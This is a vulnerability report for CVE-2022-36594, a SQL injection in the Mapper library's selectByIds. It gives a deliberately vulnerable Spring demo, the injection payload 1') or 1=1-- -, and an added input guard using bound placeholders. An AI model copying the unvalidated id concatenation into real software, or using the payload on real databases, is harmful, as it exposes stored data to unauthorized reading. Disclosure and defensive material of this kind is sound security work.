CVE-2022-36594: selectByIds function sql injection · Issue #862 · abel533/Mapper

Mapper v4.0.0 to v4.2.0 was discovered to contain a SQL injection vulnerability via the ids parameter at the selectByIds function.


Write the following test demo:
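1. UserController.java:

    import java.util.Arrays;
    import java.util.List;
    import org.springframework.beans.factory.annotation.Autowired;
    import org.springframework.stereotype.Controller;
    import org.springframework.web.bind.annotation.RequestMapping;
    import org.springframework.web.bind.annotation.ResponseBody;

    @Controller
    public class UserController {

        @Autowired
        UserService userService;

        // The ids request parameter is only split on commas, not validated
        @RequestMapping("gets")
        @ResponseBody
        public List<User> getUser(String ids) {
            List<String> idList = Arrays.asList(ids.split(","));

            return userService.gets(idList);
        }

    }

2. UserService.java:

    import java.util.Collection;
    import java.util.List;
    import org.springframework.stereotype.Service;

    @Service
    public interface UserService {

        List<User> gets(Collection<String> ids);

    }

3. UserServiceImpl.java:

    import java.util.ArrayList;
    import java.util.Collection;
    import java.util.List;
    import org.springframework.beans.factory.annotation.Autowired;
    import org.springframework.stereotype.Service;

    @Service
    public class UserServiceImpl implements UserService {

        @Autowired
        UserMapper userMapper;

        @Override
        public List<User> gets(Collection<String> ids) {
            if (ids == null || ids.isEmpty())
                return new ArrayList<>();
            // StringUtils is the demo's own helper (not shown on the page);
            // the concatenated string goes to selectByIds as-is
            String concatIds = StringUtils.concat(ids, "'", ",");
            return (List<User>) userMapper.selectByIds(concatIds);
        }

    }

4. UserMapper.java:

    import tk.mybatis.mapper.common.IdsMapper;
    import tk.mybatis.mapper.common.Mapper;
    import tk.mybatis.mapper.common.MySqlMapper;

    @org.apache.ibatis.annotations.Mapper
    public interface UserMapper extends Mapper, MySqlMapper, IdsMapper {

    }
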
5. Access the /gets route in the above demo to carry out the SQL injection attack:
(1) Under normal circumstances, when the ids parameter is passed as 1, 2, the data with id 1 and 2 is returned:

(2) But when the ids parameter value is 1') or 1=1-- -, all the data in the database is returned:
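
A caller-side guard for the /gets route, as an added example (not code from the issue or from Mapper): it parses the ids value into numbers before any SQL is built and produces `?` placeholders for a bound IN list. It assumes the id column is numeric; `IdsGuard`, `parseIds`, `placeholders` and the 500-id cap are hypothetical names and values.

```java
import java.util.ArrayList;
import java.util.Collections;
import java.util.List;

// Added example: input guard for the demo's /gets route. All names are hypothetical.
public class IdsGuard {

    private static final int MAX_IDS = 500; // assumed upper bound for one request

    // Parse "1,2,3" into numeric ids; anything that is not a plain decimal number is rejected.
    static List<Long> parseIds(String raw) {
        if (raw == null || raw.trim().isEmpty()) {
            return Collections.emptyList();
        }
        String[] parts = raw.split(",");
        if (parts.length > MAX_IDS) {
            throw new IllegalArgumentException("too many ids");
        }
        List<Long> ids = new ArrayList<>();
        for (String part : parts) {
            String s = part.trim();
            // 1 to 18 digits always fits in a long, so parseLong cannot overflow
            if (!s.matches("[0-9]{1,18}")) {
                throw new IllegalArgumentException("id is not numeric");
            }
            ids.add(Long.parseLong(s));
        }
        return ids;
    }

    // Build "?,?,?" so the values are bound as parameters instead of being inlined into the SQL text.
    static String placeholders(int n) {
        return String.join(",", Collections.nCopies(n, "?"));
    }

    public static void main(String[] args) {
        // Constructed inputs: the two ids values used in the demo above.
        for (String raw : new String[] {"1, 2", "1') or 1=1-- -"}) {
            try {
                List<Long> ids = parseIds(raw);
                System.out.println(raw + " -> accepted " + ids
                        + ", query: ... WHERE id IN (" + placeholders(ids.size()) + ")");
            } catch (IllegalArgumentException e) {
                System.out.println(raw + " -> rejected: " + e.getMessage());
            }
        }
    }
}
```

The validated list can then be bound as parameters, for instance through Mapper's `Example` criteria `andIn`, instead of being concatenated into a string for `selectByIds`.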
